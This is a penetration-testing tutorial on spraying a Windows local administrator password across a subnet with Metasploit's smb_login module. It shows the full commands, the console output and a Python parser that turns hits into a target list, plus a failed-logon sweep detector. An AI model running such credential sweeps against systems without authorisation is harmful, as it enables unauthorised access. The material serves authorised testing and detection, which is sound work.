Testing Windows Passwords With Metasploit

An attacker will take the path of least resistance to gain access to critical systems and data, and during a penetration test we'll take the same tactic. Frequently this is accomplished by guessing the password to a user's account and then either using the privileges of that account to reach critical data or escalating it to an administrator- or root-level account. Once credentials have been acquired for one host, you'll want to determine what other systems they work against. It is fairly common, for example, to gain access to a local administrator account on a workstation or server but not a domain account; in that case you will want to try that local administrator account against a whole slew of other systems, since local administrator passwords are often shared across machines built from the same image. There are a number of ways to accomplish this, but one of the most efficient is the smb_login module of Metasploit Framework 4 (http://www.metasploit.com/), which tests a single username/password combination against a lot of boxes very quickly.
msf > use auxiliary/scanner/smb/smb_login
msf auxiliary(smb_login) > set smbpass Password!
smbpass => Password!
msf auxiliary(smb_login) > set smbuser administrator
smbuser => administrator
msf auxiliary(smb_login) > set user_as_pass false
user_as_pass => false
msf auxiliary(smb_login) > set rhosts 10.0.0.100-110
rhosts => 10.0.0.100-110
msf auxiliary(smb_login) > show options

Module options (auxiliary/scanner/smb/smb_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   true             no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   PASS_FILE                          no        File containing passwords, one per line
   PRESERVE_DOMAINS  true             no        Respect a username that contains a domain name.
   RHOSTS            10.0.0.100-110   yes       The target address range or CIDR identifier
   RPORT             445              yes       Set the SMB service port
   SMBDomain         WORKGROUP        no        SMB Domain
   SMBPass           Password!        no        SMB Password
   SMBUser           administrator    no        SMB Username
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      true             no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf auxiliary(smb_login) > exploit

[*] 10.0.0.100:445 SMB - Starting SMB login bruteforce
[*] 10.0.0.101:445 SMB - Starting SMB login bruteforce
[*] Scanned 02 of 11 hosts (018% complete)
[*] 10.0.0.102:445 SMB - Starting SMB login bruteforce
[*] Scanned 03 of 11 hosts (027% complete)
[*] 10.0.0.103:445 SMB - [1/2] - Starting SMB login bruteforce
[*] Scanned 04 of 11 hosts (036% complete)
[*] 10.0.0.104:445 SMB - [1/2] - Starting SMB login bruteforce
[*] Scanned 05 of 11 hosts (045% complete)
[*] 10.0.0.105:445 SMB - [1/2] - Starting SMB login bruteforce
[*] Scanned 06 of 11 hosts (054% complete)
[*] 10.0.0.106:445 SMB - [1/2] - Starting SMB login bruteforce
[*] Scanned 07 of 11 hosts (063% complete)
[*] 10.0.0.107:445 SMB - [1/2] - Starting SMB login bruteforce
[*] 10.0.0.107:445 SMB - [1/2] - |WORKGROUP - FAILED LOGIN (Windows 5.1) administrator : (STATUS_LOGON_FAILURE)
[+] 10.0.0.107:445|WORKGROUP - SUCCESSFUL LOGIN (Windows 5.1) 'administrator' : 'Password!'
[*] Scanned 08 of 11 hosts (072% complete)
[*] 10.0.0.108:445 SMB - [1/2] - Starting SMB login bruteforce
[*] Scanned 09 of 11 hosts (081% complete)
[*] 10.0.0.109:445 SMB - [1/2] - Starting SMB login bruteforce
[*] Scanned 10 of 11 hosts (090% complete)
[*] 10.0.0.110:445 SMB - [1/2] - Starting SMB login bruteforce
[*] Scanned 11 of 11 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_login) >
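Reading results out of a sweep like this by hand gets tedious once RHOSTS is a /16 rather than eleven hosts. The parser below is an added example, not part of the original write-up and not Metasploit's own code; it consumes the console output format shown above (the sample lines are constructed here: the .107 hit is the one from the run, the lines for .109 and .110 are made up to exercise multiple hosts) and answers the questions the run exists to answer: which credential pairs worked, on which hosts a given pair is accepted, and how many logon attempts each target actually saw.

```python
from __future__ import annotations

import re
from collections import Counter
from dataclasses import dataclass

# Constructed sample in the smb_login console format shown above. The 10.0.0.107
# lines are the real hit from the run; 10.0.0.109 and 10.0.0.110 are made up.
SAMPLE_OUTPUT = """\
[*] 10.0.0.100:445 SMB - Starting SMB login bruteforce
[*] 10.0.0.107:445 SMB - [1/2] - |WORKGROUP - FAILED LOGIN (Windows 5.1) administrator : (STATUS_LOGON_FAILURE)
[+] 10.0.0.107:445|WORKGROUP - SUCCESSFUL LOGIN (Windows 5.1) 'administrator' : 'Password!'
[*] 10.0.0.109:445 SMB - [1/2] - |WORKGROUP - FAILED LOGIN (Windows 5.1) administrator : (STATUS_LOGON_FAILURE)
[*] 10.0.0.109:445 SMB - [2/2] - |WORKGROUP - FAILED LOGIN (Windows 5.1) administrator : Password! (STATUS_LOGON_FAILURE)
[+] 10.0.0.110:445|WORKGROUP - SUCCESSFUL LOGIN (Windows 5.1) 'administrator' : 'Password!'
[*] Scanned 11 of 11 hosts (100% complete)
[*] Auxiliary module execution completed
"""

# "[+] host:port|DOMAIN - SUCCESSFUL LOGIN (os) 'user' : 'pass'"
SUCCESS_RE = re.compile(
    r"^\[\+\] (?P<host>[\d.]+):(?P<port>\d+)\|(?P<domain>\S+) - SUCCESSFUL LOGIN "
    r"\((?P<os>[^)]*)\) '(?P<user>[^']*)' : '(?P<password>[^']*)'"
)
# "[*] host:port SMB - [n/m] - |DOMAIN - FAILED LOGIN (os) user : pass (NT_STATUS)"
# The password field is empty for the blank-password attempt, hence the lazy match.
FAIL_RE = re.compile(
    r"^\[\*\] (?P<host>[\d.]+):(?P<port>\d+) SMB - \[\d+/\d+\] - \|(?P<domain>\S+) - FAILED LOGIN "
    r"\((?P<os>[^)]*)\) (?P<user>\S+) : (?P<password>.*?)\s*\((?P<status>[A-Z_]+)\)"
)


@dataclass(frozen=True)
class Attempt:
    host: str
    domain: str
    user: str
    password: str
    success: bool
    status: str  # NT status string for failures, "OK" for successes


def parse_smb_login(output: str) -> list[Attempt]:
    """Turn smb_login console output into one Attempt per logon tried."""
    attempts = []
    for line in output.splitlines():
        m = SUCCESS_RE.match(line)
        if m:
            attempts.append(Attempt(m["host"], m["domain"], m["user"], m["password"], True, "OK"))
            continue
        m = FAIL_RE.match(line)
        if m:
            attempts.append(Attempt(m["host"], m["domain"], m["user"], m["password"], False, m["status"]))
        # progress and "Starting SMB login bruteforce" lines carry no attempt; skipped
    return attempts


def valid_credentials(attempts: list[Attempt]) -> list[tuple[str, str, str]]:
    """(host, user, password) for every successful login, in output order."""
    return [(a.host, a.user, a.password) for a in attempts if a.success]


def hosts_accepting(attempts: list[Attempt], user: str, password: str) -> list[str]:
    """Hosts that accept one specific pair: the reuse footprint of that credential."""
    return sorted({a.host for a in attempts if a.success and a.user == user and a.password == password})


def attempts_per_host(attempts: list[Attempt]) -> Counter:
    """Logon attempts each target saw, i.e. the failed-logon noise the run left behind."""
    return Counter(a.host for a in attempts)


if __name__ == "__main__":
    found = parse_smb_login(SAMPLE_OUTPUT)
    for host, user, password in valid_credentials(found):
        print(f"{host}: {user} / {password}")
    print("attempts per host:", dict(attempts_per_host(found)))
```

Feed it a spooled console log (spool /tmp/smb_login.log before running the module) and the hosts_accepting list is your target list for the next step, while attempts_per_host tells you how many failed-logon events you just generated on each box.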

In this example I successfully compromised one of my test systems that was using the password Password! for the local administrator account. This may seem far-fetched, but I've seen worse than this before on engagements. Be aware that this type of activity is very noisy and easily detectable by a sysadmin or security goon: every host in RHOSTS records a failed logon for the Administrator account, and with BLANK_PASSWORDS left at its default of true each host sees two attempts, a blank password and then the real guess (the [1/2] counter in the output above). Also check the account lockout threshold before pointing the module at anything other than the built-in Administrator account, which Windows versions of this era exempt from lockout by default; a few guesses against an ordinary account on every machine in a range can lock that account out across the whole domain.
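From the defender's side that noise is the signal. The detector below is an added example, not from the original write-up; it runs over a constructed batch of forwarded failed-logon records (Event ID 529 on XP/2003, like the Windows 5.1 targets above, and 4625 on Vista and later; the flat field layout is an assumption made for the example, not a real export format) and flags a source that fails against many distinct hosts inside a short window, which is exactly the footprint a single-password smb_login sweep leaves across a subnet, while ignoring one user mistyping their own password on one workstation and a source that touches hosts too slowly to fit the window.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample of forwarded Security-log failed-logon records. The field
# names and layout are assumed for this example; a real export (evtx, WEF, SIEM)
# needs its own mapping into these five fields.
EVENTS = [
    # one sweep: the same source failing against many hosts within seconds
    {"time": "2012-03-01T10:00:01", "host": "WS100", "event_id": 529, "user": "administrator", "src": "10.0.0.50"},
    {"time": "2012-03-01T10:00:02", "host": "WS101", "event_id": 529, "user": "administrator", "src": "10.0.0.50"},
    {"time": "2012-03-01T10:00:03", "host": "WS102", "event_id": 529, "user": "administrator", "src": "10.0.0.50"},
    {"time": "2012-03-01T10:00:04", "host": "WS103", "event_id": 4625, "user": "administrator", "src": "10.0.0.50"},
    {"time": "2012-03-01T10:00:05", "host": "WS104", "event_id": 4625, "user": "administrator", "src": "10.0.0.50"},
    # a user fat-fingering their own password on one box: never crosses hosts
    {"time": "2012-03-01T10:01:00", "host": "WS120", "event_id": 4625, "user": "jsmith", "src": "10.0.0.120"},
    {"time": "2012-03-01T10:01:05", "host": "WS120", "event_id": 4625, "user": "jsmith", "src": "10.0.0.120"},
    {"time": "2012-03-01T10:01:09", "host": "WS120", "event_id": 4625, "user": "jsmith", "src": "10.0.0.120"},
    # a slow spread: same source across hosts, but spaced well beyond a 5-minute window
    {"time": "2012-03-01T11:00:00", "host": "WS130", "event_id": 4625, "user": "administrator", "src": "10.0.0.60"},
    {"time": "2012-03-01T11:30:00", "host": "WS131", "event_id": 4625, "user": "administrator", "src": "10.0.0.60"},
    {"time": "2012-03-01T12:00:00", "host": "WS132", "event_id": 4625, "user": "administrator", "src": "10.0.0.60"},
    {"time": "2012-03-01T12:30:00", "host": "WS133", "event_id": 4625, "user": "administrator", "src": "10.0.0.60"},
    {"time": "2012-03-01T13:00:00", "host": "WS134", "event_id": 4625, "user": "administrator", "src": "10.0.0.60"},
]

# 529 = failed logon on XP/2003, 4625 = failed logon on Vista and later
FAILED_LOGON_IDS = {529, 4625}


def detect_sweeps(events, min_hosts=5, window_seconds=300):
    """Return one alert per (source, user) that failed to log on to at least
    min_hosts distinct hosts inside any span of window_seconds."""
    window = timedelta(seconds=window_seconds)
    by_actor = defaultdict(list)
    for e in events:
        if e["event_id"] in FAILED_LOGON_IDS:
            by_actor[(e["src"], e["user"])].append((datetime.fromisoformat(e["time"]), e["host"]))

    alerts = []
    for (src, user), hits in by_actor.items():
        hits.sort()  # by time, then host
        start = 0
        hosts_in_window = Counter()  # host -> events currently inside the window
        for t, host in hits:
            hosts_in_window[host] += 1
            # slide the start forward until the span fits the window again
            while t - hits[start][0] > window:
                old_host = hits[start][1]
                hosts_in_window[old_host] -= 1
                if hosts_in_window[old_host] == 0:
                    del hosts_in_window[old_host]
                start += 1
            if len(hosts_in_window) >= min_hosts:
                alerts.append({
                    "src": src,
                    "user": user,
                    "hosts": sorted(hosts_in_window),
                    "first": hits[start][0],
                    "last": t,
                })
                break  # one alert per actor is enough; don't re-fire on every further host
    return alerts


if __name__ == "__main__":
    for a in detect_sweeps(EVENTS):
        print(f"{a['src']} swept {len(a['hosts'])} hosts as {a['user']} "
              f"between {a['first']:%H:%M:%S} and {a['last']:%H:%M:%S}: {a['hosts']}")
```

The threshold is the tuning knob: five hosts in five minutes catches the run above with THREADS set to 1, and raising THREADS only compresses the sweep further into the window. Lowering the window to catch a deliberately slow attacker costs you false positives from scripts and service accounts with stale passwords, which is why the detector keys on distinct target hosts per source rather than on raw failure counts.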

Redspin | Web: www.redspin.com | Phone: 800-721-9177 | Email: info@redspin.com
